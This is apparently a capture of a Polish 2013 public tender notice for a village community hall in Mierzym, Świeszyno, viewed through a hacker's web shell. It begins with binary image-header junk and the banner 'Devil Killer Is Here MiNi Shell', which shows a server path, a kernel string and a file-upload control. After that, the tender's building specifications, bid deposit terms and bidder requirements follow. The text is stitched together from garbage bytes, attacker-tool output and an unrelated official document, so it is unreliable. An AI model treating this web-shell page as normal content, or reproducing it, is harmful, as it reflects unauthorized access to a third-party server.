JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130829/349746-N-2013.html

<p class="kh_header"><b>Świeszyno: Budowa świetlicy wiejskiej wraz z przyłączem i zewnętrzną instalacją wodociągową, zewnętrzną instalacją kanalizacji sanitarnej oraz zewnętrzną instalacją energetyczną zalicznikową w m. Mierzym gmina Świeszyno dz. nr 143/3</b><br>
<b>Numer ogłoszenia: 349746 - 2013; data zamieszczenia: 29.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Świeszyno , Świeszyno 71, 76-024 Świeszyno, woj. zachodniopomorskie, tel. 94 31 60 120, faks 94 31 61 491.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://ug.swieszyno.ibip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa świetlicy wiejskiej wraz z przyłączem i zewnętrzną instalacją wodociągową, zewnętrzną instalacją kanalizacji sanitarnej oraz zewnętrzną instalacją energetyczną zalicznikową w m. Mierzym gmina Świeszyno dz. nr 143/3.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeznaczenie i program użytkowy budynku
Projektuje się budynek użyteczności publicznej - świetlicę wiejską z odpowiednim 
zapleczem t. j. szatnią, pomieszczeniami sanitariatów, pokojem biurowym, pokojem komputerowym, kuchnią, kotłownią i funkcją gospodarczą. 
Jest to budynek parterowy,  niepodpiwniczony,  bez poddasza użytkowego. 
Przewiduje się ogrzewanie obiektu przy zastosowaniu pieca na paliwo stałe.   Program funkcjonalny obiektu jest przewidziany dla potrzeb maksymalnie 25 do 30 użytkowników jednocześnie. Sanitariaty: - dla kobiet i osób niepełnosprawnych
wspólne wejście do przedsionka z 2-ma umywalkami oraz jedną kabiną wc dla 
kobiet i odpowiednią kabinę wc dla osób niepełnosprawnych, w tym na wózkach 
inwalidzkich - dla mężczyzn - przedsionek z 2-ma umywalkami, wydzielone  
pomieszczenie z dwoma pisuarami oraz jedną kabiną wc. 
Do zlewozmywaka w kuchni przewiduje się doprowadzenie zimnej i ciepłej wody. 
Pokój komputerowy przewidziano wyposażyć w cztery stanowiska z komputerami 
oraz szafę na sprzęt. 
Pokój biurowy będzie pełnić równocześnie funkcję magazynu sprzętu
świetlicowego. 
W szatni przewidziano ladę i wieszaki (20 szt. haczyków podwójnych) na odzież.
Zestawienie powierzchni oraz charakterystyczne dane gabarytowe  
 powierzchnia zabudowy 	                    224,30 m2 
 powierzchnia kondygnacji netto		     176,08 m2 
    w  tym:	        pow. użytkowa		 140,66 m2 
sala świetlicy	    93,65 m2 
szatnia		     3,60 m2  
pokój biurowy	     6,43 m2 
pokój komputerowy   10,45 m2
wc kobiet 		    7,34 m2  
wc niepełnospr,	     4,37 m2   
wc mężczyzn	     7,64 m2 
kuchnia		     7,18 m2    
					  140,66 m2
pow. ruchu		                                  26,72 m2  ( komunikacja     26,72 m2 )
pow. usługowa		   8,70 m2 
kotłownia       5,12 m2 
skład opału    3,58 m2   
		   8,70 m2
Kubatura		                  861,70 m3  
IIość kondygnacji               1
Wysokość sali świetlicy			       3,02 m do 4,03 m.
      Wysokość pomieszczeń zaplecza świetlicy	       2,60 m. 
      Wysokość budynku nad terenem   zaplecze świetlicy         5,87 m
                   część z salą świetlicy   6,08 m
Warunki lokalizacyjne
      Projekt wykonano przy założeniach, że: 
      Poziom zwierciadła wody gruntowej: poniżej poziomu posadowienia 
      fundamentów i 1,50m poniżej poziomu podłogi na parterze; 
      Głębokość przemarzania gruntu hz = 0,80m; 
      Do obliczeń fundamentów przyjęto parametry geotechniczne dla średnio
      spoistych glin piaszczystych w stanie plastycznym; 
      Obciążenie śniegiem strefa 2;
      Obciążenie wiatrem strefa II;
ROZWIĄZANIA  ARCHITEKTONICZNO - BUDOWLANE
Forma i  funkcja obiektu 
Zaprojektowano budynek parterowy, bez podpiwniczenia z dachem wielospadowym o kącie pochylenia 30°. Obiekt przeznaczony jest do pełnienia funkcji świetlicy wiejskiej z niezbędnym zapleczem, na które składa się 7 odrębnych pomieszczeń o różnej funkcji (pkt. 1.2 opisu). 
Dach kryty blachodachówką. Budynek składa się z dwóch brył, z dachami dwuspadowymi, usytuowanych względem siebie prostopadle. Jedną część obiektu stanowi świetlica drugą część stanowią pomieszczenia jej zaplecza. Strop świetlicy z desek struganych, podwieszonych do dolnych pasów dźwigarów dachowych. Pomieszczenia zaplecza przykryte stropem gęsto żebrowym TERIVA, z nieużytkowym poddaszem do którego dostęp przewiduje się drewnianymi schodami składanymi w kasecie 60cm x 120cm. 
Okapy dachów zaprojektowano na jednym poziomie. Kalenica sali świetlicy 21 cm wyżej od kalenicy dachu zaplecza. 
W sali świetlicy zaprojektowano wejście z korytarza głównego (ozn. komunikacja) drzwiami przesuwnymi szerokości 2,0m oraz wyjście ewakuacyjne drzwiami szerokości 110cm (drzwi z tzw. zamknięciem przeciwpanicznym). 
Dostępność dla osób niepełnosprawnych
Zapewniono warunki niezbędne do korzystania z obiektu przez osoby niepełnosprawne w szczególności poruszające się na wózkach inwalidzkich. Pomieszczenia świetlicy zlokalizowane są na parterze budynku i są dostępne dla osób niepełnosprawnych bezpośrednio z chodnika poprzez zaprojektowaną pochylnię przy wejściu głównym obiektu.
            DANE KONSTRUKCYJNO-BUDOWLANE 
Budynek zaprojektowany w technologii tradycyjnej.
FUNDAMENTY
   ławy fundamentowe żelbetowe, wylewane z betonu żwirowego klasy C  
    20/25, wysokości    30cm, podbeton gr. 10cm;
   ściany fundamentowe gr. 25cm murowane z bloczków betonowych   
    styrodur gr. 10cm; 
ŚCIANY ZEWNĘTRZNE
   murowane z bloczków z betonu komórkowego gr 24cm  styropian EPS 70  
    gr 15cm + tynk cienkowarstwowy;  
ŚCIANY WEWNĘTRZNE
   konstrukcyjne  gr. 24cm, murowane z bloczków betonu komórkowego, 
   działowe          gr. 12cm, murowane z bloczków betonu komórkowego;
    ścianka gr.12cm (między salą świetlicy i korytarzem) z cegły ceramicznej  
    pełnej kl.15;
    ścianki z drzwiami do kabin sanitariatów wc kobiet, niepełnosprawnych i   
    mężczyzn  z płyty wodoodpornej powlekanej, wysokości 2,05m,  
    mocowanej do konstrukcji aluminiowej 15cm powyżej posadzki. 
SŁUPY
   o25cm (przed wejściem głównym do budynku)  żelbetowe, wylewane z 
    betonu C 20/25;
  38x25cm (przy wejściu z korytarza do sali świetlicy)  murowany z cegły 
    pełnej kl 15; 
KOMINY
   dymowy i wentylacyjny w kotłowni  systemowy, uniwersalny, posadowiony 
    na fundamencie; 
   wentylacyjne zaplecza  przewody o15cm, z rury stalowej, w przestrzeni  
    poddasza ocieplone wełną mineralną i wprowadzone do kominów 
    systemowych, murowanych w poziomie górnej powierzchni stropów;
   wentylacyjne świetlicy  2 przewody o20cm z rury stalowej, mocowane do  
    konstrukcji dachu oraz 2 przewody 17 x 12cm komina systemowego  
    murowanego na wieńcu (ściana wewn.); 
NADPROŻA 
  prefabrykowane typu L 19 oraz żelbetowe wylewane na placu budowy; 
STROPY
 nad zapleczem gęstożebrowe, typ TERIVA I, układ konstrukcyjny podłużny.
nad salą świetlicy  strop drewniany, podwieszony do konstrukcji dachu; 
WIEŃCE
  Żelbetowe, wylewane na placu budowy; 
DACH
 Nad świetlicą i wejściem głównym do budynku  dźwigary kratowe drewniane, 
  krokwiowo  jętkowe z elementem wieszaka.      
 Nad zapleczem  drewniana konstrukcja krokwiowo  jętkowa z płatwiami 
  pośrednimi opartymi na słupkach drewnianych; 
IZOLACJE
  Przeciwwilgociowa
    Izolację przeciwwilgociową należy każdorazowo przystosować do 
    istniejących warunków wilgotnościowych gruntu i poziomu wody gruntowej. 
    Dla gruntów mało wilgotnych przyjęto: 
pozioma ścian fundamentowych i podłóg na gruncie  2 x papa termozgrzewalna, izolację poziomą wywinąć po zewnętrznej stronie ściany min. 35cm nad poziomem terenu
podłogi w sanitariatach i kuchni izolację wywinąć na ściany 20 cm powyżej poziomu wykończonej posadzki
pionowa ścian fundamentowych  do połączenia z izolacją poziomą w cokole budynku wykonana z powłokowych mas bitumicznych nakładanych poprzez malowanie gr. min. 2mm (n.p. lepik asfaltowy nakładany na gorąco lub dysperbit ). Stosować środki które nie powodują rozpuszczania styropianu, bez wypełniaczy mineralnych
  Termiczna
dach  wełna mineralna 20cm
ściany zewnętrzne  styropian EPS 70 gr.15cm
podłogi na gruncie  styropian typ podłoga gr.10cm
ściany fundamentowe  styrodur gr.10cm
 Paroprzepuszczalna 
nad krokwiami w dachu folia o wysokiej paroprzepuszczalności 
  Paroszczelna
folia polietylenowa w dachu oraz w stropach nad parterem 
UWAGA: 
Wszystkie elementy drewniane konstrukcji, przed ich wbudowaniem, zabezpieczać środkami owadobójczymi i grzybobójczymi oraz środkami ogniochronnymi  do stopnia trudnozapalności. 
                   ELEMENTY  WYKOŃCZENIOWE 
Wykończenie wewnętrzne
Podłogi i posadzki  wg warstw pokazanych na rysunkach
Ściany i sufity
We wszystkich pomieszczeniach tynki gładkie, cementowo wapienne,            malowane 2 razy farbą lateksową,  w kuchni nad ciągiem technologicznym    
przewidzieć pas 60 cm glazury,  w sanitariatach ściany wyłożyć glazurą do  
wysokości 2m, powyżej pomalować farbą odporną na wilgoć. 
Stosować wyłącznie wyroby budowlane powszechnie stosowane w   
budownictwie, przewidziane dla pomieszczeń przeznaczonych na stały          pobyt ludzi, atestowane, oznaczone znakiem CE lub B. 
W obszarze korytarza nie stosować wyrobów łatwopalnych. W kotłowni, ściana przy piecu i ściana z umywalką  glazura do wysokości 2,0m. 
Kolorystyka  kolory pastelowe wg wyboru inwestora. 
Parapety  płyta MDF gr. 3cm. 
Wycieraczka (przed wejściem głównym do budynku)   kaseta z wycieraczką, zagłębiona  w posadzce. 
Dostęp na poddasze nieużytkowe nad zapleczem - schody drewniane w kasecie 60/120 montowane w stropie pomieszczenia kotłowni
Wyjście na dach  klapa dachowa o wymiarach 80 x 80cm.  
Sufit świetlicy  deski strugane gr 15mm mocowane do krokwi i jętek
            Wykończenie zewnętrzne
Cokół budynku  płytki klinkierowe na zaprawie mrozoodpornej
Ściany zewnętrzne  tynk mineralny cienkowarstwowy na siatce
Obróbki blacharskie, parapety  blacha stalowa ocynkowana, powlekana
Wykończenie podestu wejściowego i schodów zewnętrznych  płyty granito  gresowe mrozoodporne
Stolarka okienna i drzwiowa  okna z profili PCV wyposażone w mikrowentylację, szklone szybami  zespolonymi
Drzwi do pomieszczenia kotłowni (z korytarza)  odporność ogniowa 30min.
Drzwi wejściowe do budynku  z profili  aluminiowych , wzmocnione
Dach  pokrycie blacha dachówkowa
Wykończenie dachu na zewnątrz od spodu  podbitki z desek gr. 1,9cm, malowane bejcą lakierniczą do zastosowań zewnętrznych, impregnacyjną o właściwościach grzybobójczych i lakierem ftalowym
Rynny i rury spustowe PCV  wg rozwiązań systemowych
Opaski dookoła budynku  z płyt chodnikowych lub kostki brukowej szer. 60cm na podsypce piaskowej, ze spadkiem od budynku 2 %
WENTYLACJA
W budynku zastosowano tradycyjny system wentylacji grawitacyjnej nawiewno -   wywiewnej. Dla jej prawidłowego działania należy zapewnić: 
     DOPŁYW  POWIETRZA  ZEWNĘTRZNEGO
   wszystkie okna ze skrzydłem rozwieralno  uchylnym 
   w ścianie pod oknami świetlicy montować nawiewniki podokienne 
   w kotłowni otwór nawiewny o powierzchni netto 200cm2 w ścianie 
      zewnętrznej pod oknem, 30 cm nad posadzką  
     DOPŁYW  POWIETRZA  WEWNĘTRZNEGO 
    w sanitariatach otwory nawiewne ( kratka) w dolnej części drzwi o pow.  
     netto 200cm2  
ODPŁYW  POWIETRZA
   sala świetlicy, kuchnia, kotłownia, sanitariaty, pokoje biurowy i komputerowy   
   kominowe otwory wentylacyjne. 
INSTALACJE 
Rozwiązanie zasadniczych elementów wyposażenia budowlano   instalacyjnego,
zapewniające użytkowanie obiektu zgodnie z przeznaczeniem, w szczególności  
instalacji i urządzeń budowlanych: wodociągowych i kanalizacyjnych,
ogrzewczych, wentylacji grawitacyjnej, elektrycznych, piorunochronnych  przedstawiono w projektach branżowych.
Wodociągowa  woda z sieci wodociągowej, ciepła woda uzyskiwana ze współpracującego z kotłem podgrzewacza wody  
Kanalizacyjna  odprowadzenie ścieków do sieci kanalizacyjnej 
Centralne ogrzewanie - indywidualnie, przy zastosowaniu pieca na paliwa  
stałe
Wentylacja grawitacyjna.
 Elektryczna. 

WYPOSAŻENIE  POMIESZCZEŃ  DOSTARCZANE  PRZEZ  WYKONAWCĘ  ROBÓT   
1.	Wyposażenie Sali świetlicowej
Krzesła drewniane                                                         szt. 40
Stoły 130x80cm                                                            szt. 10
Rolety przeciwsłoneczne (wraz z montażem)                    szt.   5
2.	Wyposażenie kuchni
Szafka stojąca pod zlewozmywak 80 cm                          szt.   1
Szafki kuchenne wiszące 60 cm.                                     szt.   2
Szafka stojąca  120x80 cm                                             szt.   1
Kuchenka elektryczna czteropalnikowa z piekarnikiem       szt.   1         
3.	Wyposażenie szatni
Lada w szatni dł. 3,30m                                                 szt.   1
Wieszaki metalowe (min 20 szt. podwójnych)                  kpl.    1                        
4.	Wyposażenie biura
Biurko                                                                             szt.   1
Krzesło obrotowe                                                             szt.   1
Regał  120x60cm  wys. 180cm                                         szt.   1
5.	Wyposażenie pokoju komputerowego
Biurka komputerowe jednostanowiskowe                         szt.  3
Szafka z szufladami pod drukarkę szer. 120cm,
   wysokości 90 cm                                                            szt.  1
krzesła obrotowe                                                               szt.  3                       
6.	Wyposażenie w. c.
Lustra  (wraz z montażem)                                               szt.  5
Szafa zamykana                                                               szt.  1
Akcesoria łazienkowe                                                      kpl.3                                                                              
UWAGI  OGÓLNE
     Wszystkie materiały konstrukcyjne oraz wykończenia zastosowane w całej  
      inwestycji muszą posiadać dopuszczenia do stosowania w budownictwie 
      zgodnie z polskimi normami i przepisami. 
   Wszystkie roboty budowlane winny być prowadzone zgodnie z przepisami 
     techniczno - budowlanymi, obowiązującymi polskimi normami, zasadami  
     wiedzy technicznej i przepisami BHP pod nadzorem osoby uprawnionej.
    wyposażenie pomieszczeń przed zakupem należy uzgodnić z Inwestorem..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwości udzielenia zamówień uzupełniających lub dodatkowych stanowiących nie więcej niż 50 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-0, 45.21.00.00-2, 45.31.00.00-3, 45.33.00.00-0, 45.40.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości 15 000,00 zł (słownie: piętnaście tysięcy złotych). Wykonawca może wnieść wadium w jednej lub kilku formach przewidzianych w art. 45 ust. 6 ustawy PZP, tj.: 1 pieniądzu, 2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 3 gwarancjach bankowych, 4 gwarancjach ubezpieczeniowych, 5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42, poz. 275 ze zm.). Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego: Bałtycki Bank Spółdzielczy w Darłowie Nr 46 8566 0003 0001 0360 2000 0001 z opisem - Wadium na budowę świetlicy wiejskiej w m. Mierzym - ID.271.03.2013. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. W przypadku wniesienia wadium w formie innej niż pieniądz - oryginał dokumentu potwierdzającego wniesienie wadium należy złożyć przed upływem terminu składania ofert w osobnej kopercie załączonej do oferty, a kserokopię dokumentu poświadczoną za zgodność z oryginałem należy wpiąć do oferty. Wadium wniesione w innej formie niż w pieniądzu musi spełniać następujące wymagania: - odpowiadać co do terminu ważności terminowi związania ofertą określonemu niniejszej specyfikacji, - musi zawierać w swej treści okoliczności (zgodnie z art.45 ust.4a i 5 PZP), w których gwarant (poręczyciel) wypłaci kwotę wadium zamawiającemu wraz z klauzulą mówiącą, że wypłata nastąpi na pierwsze żądanie zamawiającego bez protestu gwaranta
( poręczyciela), Zamawiający zwraca wadium na zasadach określonych w art.46 ust.1, 1a, 2 i 4 PZP. Zamawiający zatrzymuje wadium wraz z odsetkami na zasadach określonych w art.46 ust.4a i 5 PZP. Niewniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia o spełnieniu warunków udziału - FORMULARZ nr 2 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o ww. dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca przedstawi wykaz robót budowlanych polegających na budowie nowych  budynków : - min. 2 roboty budowlane o wartości brutto 400.000,00zł każda, wykonane w okresie ostatnich pięciu lat przed terminem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących tych robót, określających, że roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - FORMULARZ nr 3 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o ww. dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony na podstawie złożonego oświadczenia o spełnieniu warunków udziału - FORMULARZ nr 2 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o ww. dokumenty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w przypadku gdy Wykonawca wykaże dysponowanie osobami zdolnymi do wykonania przedmiotu zamówienia, a w szczególności : przynajmniej 1 osobą posiadającą uprawnienia do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej, posiadającą doświadczenie w kierowaniu robotami - wykaże się co najmniej jedną robotą budowlaną polegającą na budowie nowych budynków, która będzie brała udział w realizacji przedmiotu zamówienia - FORMULARZ nr 4 i 5 do SIWZ. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o ww. dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Powyższy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę  min. wartości złożonej oferty w cenach brutto. Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o ww. dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

